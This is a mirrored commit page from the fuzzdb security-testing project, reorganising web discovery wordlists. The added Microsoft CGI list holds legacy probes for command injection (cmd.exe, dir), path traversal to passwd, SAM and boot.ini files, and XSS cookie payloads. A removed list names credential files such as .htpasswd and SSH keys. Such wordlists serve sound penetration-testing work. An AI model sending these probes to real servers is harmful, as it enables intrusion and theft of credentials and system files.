Mirrors/fuzzdb
2
0
Fork 0
mirror of https://github.com/fuzzdb-project/fuzzdb.git synced 2024-11-22 19:13:09 +00:00
Code Issues Projects Releases Packages Wiki Activity

Browse source
This commit is contained in:
unix23 2010-08-26 20:07:50 +00:00
parent a35705a5b1
commit 4f86f172a7
33 changed files with 1818 additions and 138 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

0
discovery/generic/interesting-files-apache.fuzz.txt → discovery/PredictableRes/Apache.fuzz.txt
View file

0
discovery/generic/interesting-files-apache-tomcat.fuzz.txt → discovery/PredictableRes/ApacheTomcat.fuzz.txt
View file

0
discovery/generic/cgi-HTTP-POST-reqd.fuzz.txt → discovery/PredictableRes/CGI_HTTP_POST.fuzz.txt
View file

6
discovery/PredictableRes/CGI_HTTP_POST_Windows.fuzz.txt Normal file
View file

@ -0,0 +1,6 @@
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
admin/db.php
_vti_bin/shtml.dll/_vti_rpc

79
discovery/PredictableRes/CGI_Microsoft.fuzz.txt Normal file
View file

@ -0,0 +1,79 @@
# on windows, cgi dir is usually /scripts /cgi /cgi-bin, but could be named anything or be the webroot.
/cart32.exe
/get32.exe
/visadmin.exe
/foxweb.exe
/webplus.exe?about
/fpsrvadm.exe
/MsmMask.exe
/cmd.exe?/c+dir
/cmd1.exe?/c+dir
/post32.exe|dir%20c:\\
/cgitest.exe
/hpnst.exe?c=p+i=
/Pbcgi.exe
/testcgi.exe
/webfind.exe?keywords=01234567890123456789
/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
/test-cgi.exe?<script>alert(document.cookie)</script>
/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
/mkilog.exe
/mkplog.exe
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/perl.exe?-v
/perl.exe
/ppdscgi.exe
/c32web.exe/ChangeAdminPassword
/windmail.exe
/dbmlparser.exe
/cgimail.exe
/minimal.exe
/rguest.exe
/visitor.exe
/webbbs.exe
/wguest.exe
//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
/cfgwiz.exe
/Cgitest.exe
/mailform.exe
/post16.exe
/imagemap.exe
/htimage.exe/path/filename?2,2
/htimage.exe
/Webnews.exe
/texis.exe/junk
/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/sensepost.exe?/c+dir
/testcgi.exe
/testcgi.exe?<script>alert(document.cookie)</script>
/ion-p.exe?page=c:\winnt\repair\sam
/../../../../../../../../../../WINNT/system32/ipconfig.exe
/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
/foxweb.dll
/wconsole.dll
/shtml.dll
/scripts/slxweb.dll/getfile?type=Library&file=[invalid
/filename]
/rightfax/fuwww.dll/?
/WINDMAIL.EXE?%20-n%20c:\boot.ini%
/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
/GW5/GWWEB.EXE
/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
/GW5/GWWEB.EXE?HELP=bad-request
/GWWEB.EXE?HELP=bad-request
/echo.bat
/echo.bat?&dir+c:\\
/hello.bat?&dir+c:\\
/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/input2.bat?|dir
/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/test-cgi.bat
/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X

0
discovery/generic/cgi-x-platform.fuzz.txt → discovery/PredictableRes/CGI_XPlatform.fuzz.txt
View file

0
discovery/generic/interesting-files-coldfusion.fuzz.txt → discovery/PredictableRes/ColdFusion.fuzz.txt
View file

2
discovery/PredictableRes/HTTP_POST_Microsoft.fuzz.txt Normal file
View file

@ -0,0 +1,2 @@
# Interesting Microsoft IIS files which require being scanned for with the HTTP POST verb
/msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName

0
discovery/generic/interesting-files-hyperion.fuzz.txt → discovery/PredictableRes/Hyperion.fuzz.txt
View file

0
discovery/generic/interesting-files-jboss.fuzz.txt → discovery/PredictableRes/JBoss.fuzz.txt
View file

0
discovery/generic/interesting-dirs-kitchensink.fuzz.txt → discovery/PredictableRes/KitchensinkDirectories.fuzz.txt
View file

0
discovery/generic/interesting-files-logins.fuzz.txt → discovery/PredictableRes/Logins.fuzz.txt
View file

0
discovery/generic/interesting-files-lotus-notes.fuzz.txt → discovery/PredictableRes/LotusNotes.fuzz.txt
View file

60
discovery/PredictableRes/Netware.fuzz.txt Normal file
View file

@ -0,0 +1,60 @@
/Aplicaciones
/EHS.Web
/Exchange
/ICHAIN
/ICHAINErrors
/ICHAINLogout
/ICS
/ICSIBroker
/ICSLogin
/NSearch
/NetStorage
/Portal
/SearchServlet
/apache
/aplicaciones
/bo
/eGuide
/eMFrame
/ed
/edgecgi
/edirectory
/eg
/eguide
/eis
/exteND
/extend
/fullpageservic
/home.html
/iFolder
/iManager
/ifolder
/im
/imanager
/index.html
/intranet
/iprint
/ndk
/ned
/nps
/nsadmin
/nsure
/oneNet
/pg
/portal
/portalservice
/principal
/quickfinder
/r3d
/service
/servlet
/site
/sms
/tomcat
/update
/vo
/voffice
/webacc
/webgui
/welcome
/wgate

0
discovery/generic/interesting-files-oracle-application-server.fuzz.txt → discovery/PredictableRes/OracleAppServer.fuzz.txt
View file

0
discovery/generic/php-common-backdoors.fuzz.txt → discovery/PredictableRes/PHP_CommonBackdoors.fuzz.txt
View file

0
discovery/generic/interesting-files-passwords.fuzz.txt → discovery/PredictableRes/Passwords.fuzz.txt
View file

0
discovery/generic/interesting-files-random.fuzz.txt → discovery/PredictableRes/Randomfiles.fuzz.txt
View file

1671
discovery/PredictableRes/Sharepoint.fuzz.txt Normal file
View file

File diff suppressed because it is too large Load diff

0
discovery/generic/interesting-files-siteminder.fuzz.txt → discovery/PredictableRes/SiteMinder.fuzz.txt
View file

0
discovery/generic/interesting-files-websphere.fuzz.txt → discovery/PredictableRes/Websphere.fuzz.txt
View file

0
discovery/generic/cms/drupal_plugins.fuzz.txt → discovery/PredictableRes/cms/drupal_plugins.fuzz.txt
View file

0
discovery/generic/cms/drupal_themes.fuzz.txt → discovery/PredictableRes/cms/drupal_themes.fuzz.txt
View file

0
discovery/generic/cms/joomla_plugins.fuzz.txt → discovery/PredictableRes/cms/joomla_plugins.fuzz.txt
View file

0
discovery/generic/cms/joomla_themes.fuzz.txt → discovery/PredictableRes/cms/joomla_themes.fuzz.txt
View file

0
discovery/generic/cms/readme.fuzz.txt → discovery/PredictableRes/cms/readme.fuzz.txt
View file

0
discovery/generic/cms/wp_plugins.fuzz.txt → discovery/PredictableRes/cms/wp_plugins.fuzz.txt
View file

0
discovery/generic/cms/wp_themes.fuzz.txt → discovery/PredictableRes/cms/wp_themes.fuzz.txt
View file

0
discovery/generic/proxy-conf.fuzz.txt → discovery/PredictableRes/proxy-conf.fuzz.txt
View file

0
discovery/generic/tftp.fuzz.txt → discovery/PredictableRes/tftp.fuzz.txt
View file

51
discovery/unix/interesting-files-dotfiles.fuzz.txt
View file

@ -1,51 +0,0 @@
/.DS_Store
/.FBCIndex
/.access
/.addressbook
/.bash_history
/.bashrc
/.cobalt
/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
/.cobalt/sysManage/../admin/.htaccess
/.fhp
/.forward
/.history
/.htaccess
/.htaccess.old
/.htaccess.save
/.htaccess~
/.htpasswd
/.lynx_cookies
/.mysql_history
/.nsconfig
/.nsf/../winnt/win.ini
/.passwd
/.perf
/.pinerc
/.plan
/.proclog
/.procmailrc
/.profile
/.psql_history
/.rhosts
/.sh_history
/.ssh
/.ssh/authorized_keys
/.ssh/known_hosts
/.www_acl
/.wwwacl
/.access
/.cobalt
/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
/.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
/.fhp
/.htaccess
/.htaccess.old
/.htaccess.save
/.htaccess~
/.htpasswd
/.nsconfig
/.passwd
/.www_acl
/.wwwacl

36
discovery/unix/interesting-files-iplanet.fuzz.txt
View file

@ -1,36 +0,0 @@
/?Publisher
/?wp-cs-dump
/?wp-html-rend
/?wp-start-ver
/?wp-stop-ver
/?wp-uncheckout
/?wp-usr-prop
/?wp-ver-diff
/?wp-ver-info
/?wp-verify-link
/admin-serv
/admin-serv/config/admpw
/admpw
/agents
/bin
/ca
/ca
/cgi-bin
/config
/dirb_random.cgi
/dirb_random.jsp
/dirb_random.shtml
/docs
/dsgw
/help
/index.html
/jsp
/manual
/mc-icons
/netshare
/ns-icons
/publisher
/search
/search-ui
/servlet
/servlets

51
discovery/unix/interesting-files-sun-app-server.fuzz.txt
View file

@ -1,51 +0,0 @@
/ias-samples
/ias-samples/index.html
/index.html
/cgi-bin
/cgi-bin/gx.cgi
/cgi-bin/gx.dll
/cgi-bin/gx.exe
/gx
/gx.cgi
/gx.exe
/GXApp
/GXApp/index.html
/GXApp/COnlineBank
/GXApp/COnlineBank/COBLogin.html
/GXApp/CSample
/GXApp/CSample/index.html
/GXApp/images
/GXApp/OnlineBank
/GXApp/OnlineBank/OBLogin.html
/fortune
/NASApp/fortune/fortune
/lotery
/COnlineBank
/CSample
/OnlineBank
/NASApp
/NASApp/system
/NASApp/system/ValidationError.jsp
/NASApp/system/ExceptionThrown.jsp
/NASApp/system/JSPRunner
/NASApp/system/JSPRunnerSticky
/NASApp/system/SessionInvalidator
/NASApp/system/StaticServlet
/NASApp/system/WelcomeListServlet
/NASApp/system/FormAuthServlet
/NASApp/system/CertAuthServlet
/NASApp/system/BasicAuthServlet
/system
/ValidationError.jsp
/ExceptionThrown.jsp
/JSPRunner
/JSPRunnerSticky
/SessionInvalidator
/StaticServlet
/WelcomeListServlet
/FormAuthServlet
/CertAuthServlet
/BasicAuthServlet
/com.netscape.server.servlet.jsp.JSPRunner
/servlet
/classes